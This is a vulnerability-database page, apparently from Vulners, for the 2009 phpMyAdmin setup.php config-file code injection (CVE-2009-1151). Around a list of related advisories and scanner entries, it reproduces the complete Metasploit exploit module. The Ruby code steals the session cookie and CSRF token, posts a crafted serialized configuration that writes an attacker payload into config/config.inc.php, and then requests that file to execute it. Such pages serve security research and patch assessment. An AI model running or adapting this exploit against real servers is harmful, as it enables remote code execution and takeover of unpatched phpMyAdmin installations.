Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PhpMyAdmin Config File Code Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 158 Views

PhpMyAdmin Config File Code Injection vulnerability in scripts/setup.ph

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		phpmyadmin -- insufficient output sanitizing when generating configuration file
24 Mar 200900:00
freebsd
0day.today		phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
9 Jun 200900:00
zdt
GithubExploit		Exploit for Code Injection in Phpmyadmin
3 Feb 201822:26
githubexploit
GithubExploit		Exploit for Code Injection in Phpmyadmin
3 Feb 201822:26
githubexploit
Tenable Nessus		phpMyAdmin 2.11.x < 2.11.9.5 / 3.x < 3.1.3.1 RCE (PMASA-2009-3)
19 Apr 201900:00
nessus
Tenable Nessus		Debian DSA-1824-1 : phpmyadmin - several vulnerabilities
30 Jun 200900:00
nessus
Tenable Nessus		FreeBSD : phpmyadmin -- insufficient output sanitizing when generating configuration file (06f9174f-190f-11de-b2f0-001c2514716c)
25 Mar 200900:00
nessus
Tenable Nessus		GLSA-200906-03 : phpMyAdmin: Multiple vulnerabilities
30 Jun 200900:00
nessus
Tenable Nessus		phpMyAdmin setup.php save Action Arbitrary PHP Code Injection (PMASA-2009-3)
16 Apr 200900:00
nessus
Tenable Nessus		openSUSE Security Update : phpMyAdmin (phpMyAdmin-711)
21 Jul 200900:00
nessus
Rows per page

                                                ##
# $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;PhpMyAdmin Config File Code Injection&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a vulnerability in PhpMyAdmin&#39;s setup
				feature which allows an attacker to inject arbitrary PHP
				code into a configuration file. The original advisory says
				the vulnerability is present in phpMyAdmin versions 2.11.x
				&#60; 2.11.9.5 and 3.x &#60; 3.1.3.1; this module was tested on
				3.0.1.1.

				The file where our payload is written
				(phpMyAdmin/config/config.inc.php) is not directly used by
				the system, so it may be a good idea to either delete it or
				copy the running config (phpMyAdmin/config.inc.php) over it
				after successful exploitation.
			},
			&#39;Author&#39;         =&#62;
				[
					&#39;Greg Ose&#39;, # Discovery
					&#39;pagvac&#39;,   # milw0rm PoC
					&#39;egypt&#39;     # metasploit module
				],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9669 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2009-1151&#39; ],
					[ &#39;OSVDB&#39;, &#39;53076&#39; ],
					[ &#39;URL&#39;, &#39;http://www.milw0rm.com/exploits/8921&#39; ],
					[ &#39;URL&#39;, &#39;http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php&#39; ],
					[ &#39;URL&#39;, &#39;http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/&#39; ]
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Platform&#39;       =&#62; [&#39;php&#39;],
			&#39;Arch&#39;           =&#62; ARCH_PHP,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;       =&#62; 4000, # unlimited really since our shellcode gets written to a file
					&#39;DisableNops&#39; =&#62; true,
					# No filtering whatsoever, so no badchars
					&#39;Compat&#39;      =&#62;
						{
							&#39;ConnectionType&#39; =&#62; &#39;find&#39;,
						},
					&#39;Keys&#39;        =&#62; [&#39;php&#39;],
				},
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;Automatic (phpMyAdmin 2.11.x &#60; 2.11.9.5 and 3.x &#60; 3.1.3.1)&#39;, { } ],
				],
			&#39;DefaultTarget&#39;  =&#62; 0,
			&#39;DisclosureDate&#39; =&#62; &#39;Mar 24 2009&#39;))

		register_options(
			[
				OptString.new(&#39;URI&#39;,   [ true,  &#34;Base phpMyAdmin directory path&#34;, &#39;/phpMyAdmin/&#39;]),
			], self.class)
	end

	def exploit
		# First, grab the session cookie and the CSRF token
		print_status(&#34;Grabbing session cookie and CSRF token&#34;)
		uri = datastore[&#39;URI&#39;] + &#34;scripts/setup.php&#34;
		response = send_request_raw({ &#39;uri&#39; =&#62; uri})
		if !response
			raise RuntimeError.new(&#34;Server did not respond to our initial request&#34;)
			return
		end
		if (response.body !~ /&#34;token&#34;\s*value=&#34;([^&#34;]*)&#34;/)
			raise RuntimeError.new(&#34;Couldn&#39;t find token and can&#39;t continue without it. Is URI set correctly?&#34;)
			return
		end
		token = $1
		cookie = response[&#34;Set-Cookie&#34;]

		# There is probably a great deal of randomization that can be done with
		# this format.
		config = &#34;a:1:{s:7:\&#34;Servers\&#34;;a:1:{i:0;a:6:{s:#{payload.encoded.length + 13}:\&#34;&#34;
		config &#60;&#60; &#34;host&#39;]=&#39;&#39;;&#34; + payload.encoded + &#34;;//&#34;
		config &#60;&#60; &#39;&#34;;s:9:&#34;&#39; + rand_text_alpha(9) + &#39;&#34;;s:9:&#34;extension&#34;;s:6:&#34;mysqli&#34;;s:12:&#34;connect_type&#34;&#39;
		config &#60;&#60; &#39;;s:3:&#34;tcp&#34;;s:8:&#34;compress&#34;;b:0;s:9:&#34;auth_type&#34;;s:6:&#34;config&#34;;s:4:&#34;user&#34;;s:4:&#34;&#39; + rand_text_alpha(4) + &#39;&#34;;}}}&#39;

		data = &#34;token=#{token}&action=save&configuration=&#34;
		data &#60;&#60; Rex::Text.uri_encode(config)
		data &#60;&#60; &#34;&eoltype=unix&#34;

		# Now that we&#39;ve got the cookie and token, send the evil
		print_status(&#34;Sending save request&#34;)
		response = send_request_raw({
			&#39;uri&#39;	  =&#62; datastore[&#39;URI&#39;] + &#34;/scripts/setup.php&#34;,
			&#39;method&#39;  =&#62; &#39;POST&#39;,
			&#39;data&#39;    =&#62; data,
			&#39;cookie&#39;  =&#62; cookie,
			&#39;headers&#39; =&#62;
			{
				&#39;Content-Type&#39;	 =&#62; &#39;application/x-www-form-urlencoded&#39;,
				&#39;Content-Length&#39; =&#62; data.length
			}
		}, 3)

		print_status(&#34;Requesting our payload&#34;)

		# very short timeout because the request may never return if we&#39;re
		# sending a socket payload
		timeout = 0.1
		response = send_request_raw({
			# Allow findsock payloads to work
			&#39;global&#39; =&#62; true,
			&#39;uri&#39; =&#62; datastore[&#39;URI&#39;] + &#34;/config/config.inc.php&#34;
		}, timeout)

		handler
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.93271
phpmyadminconfig filecode injectionvulnerabilityscripts/setup.phparbitrary code executionsecurity issueconfiguration file.
158